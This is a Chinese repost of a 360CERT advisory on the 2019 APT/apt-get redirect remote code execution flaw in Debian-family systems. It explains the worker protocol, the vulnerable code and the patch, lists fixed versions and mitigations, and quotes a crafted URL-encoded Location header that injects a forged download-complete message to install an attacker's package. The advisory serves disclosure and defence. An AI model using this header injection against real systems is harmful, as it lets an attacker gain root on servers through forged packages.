linux心跳包检测代码_运维人员注意:Linux 包管理器apt/apt-get远程代码执行漏洞预警...

该博客文章详细介绍了2019年发现的Debian包管理器APT的一个严重漏洞,该漏洞允许攻击者通过HTTP中间人攻击执行远程代码。攻击者可以通过构造特定的HTTP响应来绕过APT的签名验证,导致受害者安装恶意软件。360CERT建议用户更新APT软件或检查服务器流量。文章还提供了漏洞利用的详细过程和补丁分析,以及针对不同Debian系发行版的修复建议。
摘要由CSDN通过智能技术生成
e8c52bcf58d081155db6f353c042dba7.png

0x00 漏洞背景

2019年1月22日 @Max Justicz 在其博客中公开了有关于 debian 系包管理器apt/apt-get 远程代码执行的一些细节。当通过 APT 进行任意软件的安装、更新等,默认会走 HTTP 而非 HTTPS,攻击者可以通过中间人劫持等手法劫持 HTTP 流量,并通过重定向及相关响应头的构造,完美构造合法的安装包签名,以此绕过 APT 本地签名的判断。攻击一旦触发,便可导致目标服务器的 root 权限被拿下。

360CERT 判断该漏洞危害严重,影响面有限。建议使用Debain系发行版的用户及时进行apt 软件的更新或者对服务器进行流量自查。

0x01 漏洞详情

在获取数据时,apt会fork出worker进程用于数据传输。父进程使用类似于HTTP的协议通过stdin/stdout与这些worker进程进行通信,告诉它们下载什么以及将下载的内容放在文件系统的什么位置上。例如,当apt install cowsay时fork出/usr/lib/apt/methods/http,返回一条100 Capabilities消息:

100 CapabilitiesVersion: 1.2Pipeline: trueSend-Config: true

父进程会发送它的设置并且请求一个资源:

601 ConfigurationConfig-Item: APT::Architecture=amd64Config-Item: APT::Build-Essential::=build-essentialConfig-Item: APT::Install-Recommends=1(...many more lines omitted...)600 URI AcquireURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debFilename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.debExpected-SHA256: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Expected-MD5Sum: 27967ddb76b2c394a0714480b7072ab3Expected-Checksum-FileSize: 20070

然后worker进程的响应像下面这样:

102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Connecting to prod.debian.map.fastly.net102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Connecting to prod.debian.map.fastly.net (2a04:4e42:8::204)102 StatusURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debMessage: Waiting for headers200 URI StartURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debSize: 20070Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000201 URI DoneURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debFilename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.debSize: 20070Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000MD5-Hash: 27967ddb76b2c394a0714480b7072ab3MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Checksum-FileSize-Hash: 20070

当HTTP服务器返回redirect重定向时,worker进程返回103 Redirect而不是201 URI Done,然后父进程使用这个响应来确定接下来应该请求的资源:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://example.com/new-uri

漏洞在于对Location进行URL解码后就将其直接将其附加到103 Redirect响应中,造成了注入。

// From methods/basehttp.ccNextURI = DeQuoteString(Req.Location);...Redirect(NextURI);// From apt-pkg/acquire-method.ccvoid pkgAcqMethod::Redirect(const string &NewURI){ std::cout << "103 RedirectURI: " << Queue->Uri << "" << "New-URI: " << NewURI << "" << "" << std::flush; Dequeue();}

如果HTTP服务器返回的Location为:

Location: /new-uri%0AFoo%3A%20Bar

则响应包如下:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://deb.debian.org/new-uriFoo: Bar

那么再进一步构造:

Location: /payload%0A%0A201%20URI%20Done%0AURI%3A%20http%3A//deb.debian.org/payload%0AFilename%3A%20/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg%0ASize%3A%2020070%0ALast-Modified%3A%20Tue%2C%2007%20Mar%202017%2000%3A29%3A01%20%2B0000%0AMD5-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0AMD5Sum-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0ASHA256-Hash%3A%20858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831%0AChecksum-FileSize-Hash%3A%2020070%0A

就会形成具有危害的情况:

103 RedirectURI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.debNew-URI: http://deb.debian.org/payload201 URI DoneURI: http://deb.debian.org/payloadFilename: /var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpgSize: 20070Last-Modified: Tue, 07 Mar 2017 00:29:01 +0000MD5-Hash: 27967ddb76b2c394a0714480b7072ab3MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831Checksum-FileSize-Hash: 20070

这时apt就会受到攻击者的控制,安装指定的package并且可以完美通过校验步骤,进而导致apt/apt-get安装到非官方源中的package。而由于apt/apt-get一般情况下只能由权限相对较高的用户执行,进而导致恶意的package可以任意执行代码/命令。

0x02 补丁分析

AcqMethod::Redirect函数通过对NewURI中的字符进行校验来修复该漏洞。

82f77472fd8f8b94837de100182a2986.png
f61aced58f8ae1d8b3e09a1db899ca4d.png

0x03 修复建议

Debain 可以通过添加 security 分支的源进行更新,主分支还受到影响

0d7f23504e5b1dfe1710771ab9818a43.png

确保

/etc/sources.list

含有如下字段

deb http://deb.debian.org/debian-security/ {发行版编号例如stretch}/updates maindeb-src http://deb.debian.org/debian-security/ {发行版编号例如stretch}/updates main

再执行

apt update && apt-get install apt

即可完成修复更新

Ubunutu 可以进行软件包版本升级

对应系统升级到如下版本:

  • Ubuntu 18.10 apt - 1.7.0ubuntu0.1
  • Ubuntu 18.04 LTS apt - 1.6.6ubuntu0.1
  • Ubuntu 16.04 LTS apt - 1.2.29ubuntu0.1
  • Ubuntu 14.04 LTS apt - 1.0.1ubuntu2.19

或者在更新时禁用 HTTP 重定向:

$ sudo apt update -o Acquire::http::AllowRedirect=false$ sudo apt upgrade -o Acquire::http::AllowRedirect=false

再者可以使用完全由 https 构成的源进行更新

0x04 时间线

2019-01-22 @Max Justicz公开漏洞细节

2019-01-23 360CERT发布预警

0x05 参考链接

  1. Remote Code Execution in apt/apt-get
  2. [https://justi.cz/security/2019/01/22/apt-rce.html]

作者:360cert

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值